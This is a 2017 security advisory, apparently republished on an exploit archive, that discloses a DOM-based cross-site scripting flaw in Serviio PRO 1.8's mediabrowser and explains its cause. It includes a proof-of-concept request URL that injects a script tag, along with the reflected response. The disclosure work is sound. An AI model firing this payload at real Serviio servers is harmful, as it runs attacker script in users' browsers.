Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) XSS

Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) XSS: Posted May 3, 2017; Authored by LiquidWorm | Site zeroscience.mk; Serviio PRO DLNA Media Streaming Server version 1.8.0.0 PRO, 1.7.1, 1.7.0, and 1.6.1 suffer from a mediabrowser cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 6d428a56973d6c977d13c723fe711027e28308c973c8c62cb6f7d5331b239583; Download | Favorite | View

Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) XSS


Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) DOM Based XSS


Vendor: Petr Nejedly | Six Lines Ltd
Product web page: http://www.serviio.org
Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1

Summary: Serviio is a free media server. It allows you to stream your media
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
games console or mobile phone) on your connected home network.

Desc: The application is vulnerable to a DOM-based cross-site scripting. Data is
read from document.location and passed to document.write() via the following statement
in the response: document.write('<base href="' + document.location + '" />');
This can be exploited to execute arbitrary HTML and script code in a user's browser DOM
in context of an affected site.

Tested on: Restlet-Framework/2.2
           Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
           Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
           Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5406
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5406.php

SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094


12.12.2016

--


Request:

http://172.19.0.214:23424/mediabrowser/#/browse/V_F?title=Folders&b=Home&b=Video&bid=0"><script>alert("ZSL")</script>


Element response:

<base href="http://172.19.0.214:23424/mediabrowser/#/login?title=Folders&b=Home&b=Video&bid=0%22%3E%3Cscript%3Ealert(%22ZSL%22)%3C%2Fscript%3E">

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) XSS

Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) XSS

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) XSS

Share This

Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) XSS

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems